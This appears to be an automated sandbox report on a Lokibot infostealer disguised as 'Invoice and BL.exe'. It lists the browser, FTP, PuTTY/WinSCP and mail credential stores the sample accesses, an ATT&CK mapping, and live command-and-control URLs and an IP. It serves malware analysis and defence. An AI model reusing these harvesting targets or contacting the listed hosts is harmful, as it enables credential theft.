            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Invoice and BL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice and BL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00406069 GetUserNameW,
Source: C:\Users\user\Desktop\Invoice and BL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: SmtpPassword
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 121 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 211 | Disable or Modify Tools 1 | Credentials in Registry 2 | Process Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 212 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 211 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 11 | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph


            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
Invoice and BL.exe | 59% | Virustotal |
Invoice and BL.exe | 34% | Metadefender |
Invoice and BL.exe | 61% | ReversingLabs | ByteCode-MSIL.Infostealer.PrimaryPass
Invoice and BL.exe | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

Source | Detection | Scanner | Label
7.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.Invoice and BL.exe.397e408.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

Source | Detection | Scanner | Label
abixmaly.duckdns.org | 10% | Virustotal |

            URLs

Source | Detection | Scanner | Label
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://abixmaly.duckdns.org/binge/fre.php | 13% | Virustotal |
http://abixmaly.duckdns.org/binge/fre.php | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://abixmaly.duckdns.org/binge/fre.phpNg | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
abixmaly.duckdns.org | 192.169.69.26 | true | true | | unknown

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://abixmaly.duckdns.org/binge/fre.php | true | Virustotal: 13%; Avira URL Cloud: safe | unknown

            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.ibsensoftware.com/ | RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.fonts.com | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://abixmaly.duckdns.org/binge/fre.phpNg | RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
http://www.sakkal.com | Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.169.69.26 | abixmaly.duckdns.org | United States | 23033 | WOWUS | true

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:458970
                                Start date:03.08.2021
                                Start time:23:24:19
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 43s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Invoice and BL.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@3/3@3/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 97.1% (good quality ratio 93%)
                                • Quality average: 76.7%
                                • Quality standard deviation: 28.9%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 52.147.198.201, 20.82.210.154, 23.211.4.86, 40.112.88.60, 13.107.4.50, 51.103.5.159, 80.67.82.235, 80.67.82.211, 20.49.157.6
